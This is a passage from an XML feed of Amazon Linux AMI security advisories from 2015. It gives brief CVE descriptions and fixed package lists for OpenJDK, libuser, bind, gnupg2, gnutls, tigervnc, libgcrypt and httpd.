A flaw was found in the way the Libraries component of OpenJDK verified Online Certificate Status Protocol (OCSP) responses. An OCSP response with no nextUpdate date specified was incorrectly handled as having unlimited validity, possibly causing a revoked X.509 certificate to be interpreted as valid.
CVE-2015-4733:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4732:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4731:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4000:
A flaw was found in the way the TLS protocol composed the Diffie-Hellman (DH) key exchange. A man-in-the-middle attacker could use this flaw to force the use of weak 512 bit export-grade keys during the key exchange, allowing them to decrypt all traffic.
CVE-2015-3149:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack. Note: This issue was originally fixed as CVE-2015-0383, but the fix was regressed in the RHSA-2015:0809 advisory.
CVE-2015-2808:
A flaw was found in the RC4 encryption algorithm. When using certain keys for RC4 encryption, an attacker could obtain portions of the plain text from the cipher text without the knowledge of the encryption key.
CVE-2015-2659:
It was discovered that the GCM (Galois Counter Mode) implementation in the Security component of OpenJDK failed to properly perform a null check. This could cause the Java Virtual Machine to crash when an application performed encryption using a block cipher in the GCM mode.
CVE-2015-2632:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-2628:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-2625:
A flaw was found in the way the JSSE component in OpenJDK performed X.509 certificate identity verification when establishing a TLS/SSL connection to a host identified by an IP address. In certain cases, the certificate was accepted as valid if it was issued for a host name to which the IP address resolves rather than for the IP address.
CVE-2015-2621:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-2601:
It was discovered that the JCE component in OpenJDK failed to use constant time comparisons in multiple cases. An attacker could possibly use these flaws to disclose sensitive information by measuring the time used to perform operations using these non-constant time comparisons.
CVE-2015-2590:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0383:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack. Note: This issue was originally fixed as CVE-2015-0383, but the fix was regressed in the RHSA-2015:0809 advisory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0383" title="" id="CVE-2015-0383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2590" title="" id="CVE-2015-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2601" title="" id="CVE-2015-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2621" title="" id="CVE-2015-2621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2625" title="" id="CVE-2015-2625" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2628" title="" id="CVE-2015-2628" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2632" title="" id="CVE-2015-2632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2659" title="" id="CVE-2015-2659" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2808" title="" id="CVE-2015-2808" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3149" title="" id="CVE-2015-3149" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4731" title="" id="CVE-2015-4731" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4732" title="" id="CVE-2015-4732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4733" title="" id="CVE-2015-4733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4748" title="" id="CVE-2015-4748" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4749" title="" id="CVE-2015-4749" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4760" title="" id="CVE-2015-4760" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1228.html" title="" id="RHSA-2015:1228" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.51-1.b16.6.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.51-1.b16.6.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" 
version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.51" release="1.b16.6.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.51-1.b16.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-572</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-572: important priority package update for usermode libuser</title><issued date="2015-07-23 10:50:00" /><updated date="2015-07-27 17:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3246:
Two flaws were found in the way the libuser library handled the /etc/passwd file. A local attacker could use an application compiled against libuser (for example, userhelper) to manipulate the /etc/passwd file, which could result in a denial of service or possibly allow the attacker to escalate their privileges to root.
CVE-2015-3245:
libuser does not filter newline characters in the GECOS field.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3245" title="" id="CVE-2015-3245" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3246" title="" id="CVE-2015-3246" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1482.html" title="" id="RHSA-2015:1482" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="usermode" version="1.102" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/usermode-1.102-3.18.amzn1.x86_64.rpm</filename></package><package name="usermode-debuginfo" version="1.102" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/usermode-debuginfo-1.102-3.18.amzn1.x86_64.rpm</filename></package><package name="usermode" version="1.102" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/usermode-1.102-3.18.amzn1.i686.rpm</filename></package><package name="usermode-debuginfo" version="1.102" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/usermode-debuginfo-1.102-3.18.amzn1.i686.rpm</filename></package><package name="libuser-devel" version="0.56.13" release="8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuser-devel-0.56.13-8.15.amzn1.x86_64.rpm</filename></package><package name="libuser-python" version="0.56.13" release="8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuser-python-0.56.13-8.15.amzn1.x86_64.rpm</filename></package><package name="libuser-debuginfo" version="0.56.13" release="8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuser-debuginfo-0.56.13-8.15.amzn1.x86_64.rpm</filename></package><package name="libuser" version="0.56.13" release="8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuser-0.56.13-8.15.amzn1.x86_64.rpm</filename></package><package name="libuser-python" version="0.56.13" release="8.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/libuser-python-0.56.13-8.15.amzn1.i686.rpm</filename></package><package name="libuser" version="0.56.13" release="8.15.amzn1" epoch="0" arch="i686"><filename>Packages/libuser-0.56.13-8.15.amzn1.i686.rpm</filename></package><package name="libuser-debuginfo" version="0.56.13" release="8.15.amzn1" epoch="0" arch="i686"><filename>Packages/libuser-debuginfo-0.56.13-8.15.amzn1.i686.rpm</filename></package><package name="libuser-devel" version="0.56.13" release="8.15.amzn1" epoch="0" arch="i686"><filename>Packages/libuser-devel-0.56.13-8.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-573</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-573: critical priority package update for bind</title><issued date="2015-07-28 11:32:00" /><updated date="2015-07-28 11:32:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5477:
Embargoed
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477" title="" id="CVE-2015-5477" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-sdb" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.38.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.38.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-574</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-574: low priority package update for gnupg2</title><issued date="2015-07-28 11:35:00" /><updated date="2015-07-28 11:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1606:
1193008:
CVE-2015-1606 gnupg2: invalid memory read using a garbled keyring
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1606" title="" id="CVE-2015-1606" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2-debuginfo" version="2.0.28" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.28-1.30.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.28-1.30.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.28" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.28-1.30.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.28-1.30.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.28" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.28-1.30.amzn1.i686.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.28-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-575</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-575: medium priority package update for gnutls</title><issued date="2015-08-04 11:36:00" /><updated date="2015-08-04 17:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0294:
It was discovered that GnuTLS did not check if all sections of X.509 certificates indicate the same signature algorithm. This flaw, in combination with a different flaw, could possibly lead to a bypass of the certificate signature check.
CVE-2015-0282:
It was found that GnuTLS did not verify whether a hashing algorithm listed in a signature matched the hashing algorithm listed in the certificate. An attacker could create a certificate that used a different hashing algorithm than it claimed, possibly causing GnuTLS to use an insecure, disallowed hashing algorithm during certificate verification.
CVE-2014-8155:
It was found that GnuTLS did not check activation and expiration dates of CA certificates. This could cause an application using GnuTLS to incorrectly accept a certificate as valid when its issuing CA is already expired.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8155" title="" id="CVE-2014-8155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0282" title="" id="CVE-2015-0282" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0294" title="" id="CVE-2015-0294" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1457.html" title="" id="RHSA-2015:1457" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-debuginfo" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-18.14.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-18.14.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-18.14.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-18.14.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" 
release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-18.14.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-18.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-576</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-576: medium priority package update for tigervnc</title><issued date="2015-08-04 17:16:00" /><updated date="2015-08-04 17:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0011:
1050928:
CVE-2014-0011 tigervnc: ZRLE decoding heap-based buffer overflow in vncviewer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0011" title="" id="CVE-2014-0011" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc-server-module" version="1.3.0" release="7.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.3.0-7.23.amzn1.x86_64.rpm</filename></package><package name="tigervnc" version="1.3.0" release="7.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.3.0-7.23.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.3.0" release="7.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.3.0-7.23.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.3.0" release="7.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.3.0-7.23.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.3.0" release="7.23.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.3.0-7.23.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.3.0" release="7.23.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.3.0-7.23.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.3.0" release="7.23.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.3.0-7.23.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.3.0" release="7.23.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.3.0-7.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-577</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-577: medium priority package update for libgcrypt</title><issued date="2015-08-04 17:43:00" /><updated date="2015-08-04 17:55:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0837:
1198147:
CVE-2015-0837 libgcrypt: last-level cache side-channel attack
CVE-2014-5270:
Libgcrypt before 1.5.4, as used in GnuPG and other products, does not properly perform ciphertext normalization and ciphertext randomization, which makes it easier for physically proximate attackers to conduct key-extraction attacks by leveraging the ability to collect voltage data from exposed metal, a different vector than CVE-2013-4576.
1128531:
CVE-2014-5270 libgcrypt: ELGAMAL side-channel attack
CVE-2014-3591:
1198145:
CVE-2014-3591 libgcrypt: use ciphertext blinding for Elgamal decryption (new side-channel attack)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3591" title="" id="CVE-2014-3591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5270" title="" id="CVE-2014-5270" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0837" title="" id="CVE-2015-0837" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libgcrypt-devel" version="1.5.3" release="12.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-devel-1.5.3-12.18.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.18.amzn1.x86_64.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-1.5.3-12.18.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.18.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.18.amzn1.i686.rpm</filename></package><package name="libgcrypt-devel" version="1.5.3" release="12.18.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-devel-1.5.3-12.18.amzn1.i686.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.18.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-1.5.3-12.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-578</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-578: medium priority package update for httpd</title><issued date="2015-08-17 12:23:00" /><updated date="2015-08-17 12:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3183:
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks.
1243887:
CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3183" title="" id="CVE-2015-3183" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-debuginfo" version="2.2.31" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.31" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.31" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.31" release="1.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.31" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.31-1.6.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.31" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.31-1.6.amzn1.noarch.rpm</filename></package><package name="httpd-devel" version="2.2.31" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.31-1.6.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.31" release="1.6.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.31-1.6.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.31" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.31-1.6.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.31" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.31-1.6.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.31" release="1.6.amzn1" epoch="0" 
arch="i686"><filename>Packages/httpd-2.2.31-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-579</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-579: medium priority package update for httpd24</title><issued date="2015-08-17 12:27:00" /><updated date="2015-08-17 12:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3185:
It was discovered that in httpd 2.4, the internal API function ap_some_auth_required() could incorrectly indicate that a request was authenticated even when no authentication was used. An httpd module using this API function could consequently allow access that should have been denied.
1243888:
CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4
CVE-2015-3183:
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks.
1243887:
CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser
CVE-2015-0253:
A NULL pointer dereference flaw was found in the way httpd generated certain error responses. A remote attacker could possibly use this flaw to crash the httpd child process using a request that triggers a certain HTTP error.
1243891:
CVE-2015-0253 httpd: NULL pointer dereference crash with ErrorDocument 400 pointing to a local URL-path
CVE-2015-0228:
A denial of service flaw was found in the way the mod_lua httpd module processed certain WebSocket Ping requests. A remote attacker could send a specially crafted WebSocket Ping packet that would cause the httpd child process to crash.
1202988:
CVE-2015-0228 httpd: Possible mod_lua crash due to websocket bug
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0228" title="" id="CVE-2015-0228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0253" title="" id="CVE-2015-0253" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3183" title="" id="CVE-2015-3183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3185" title="" id="CVE-2015-3185" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-devel" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.16" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.16" release="1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.16-1.62.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.16" release="1.62.amzn1" epoch="0" 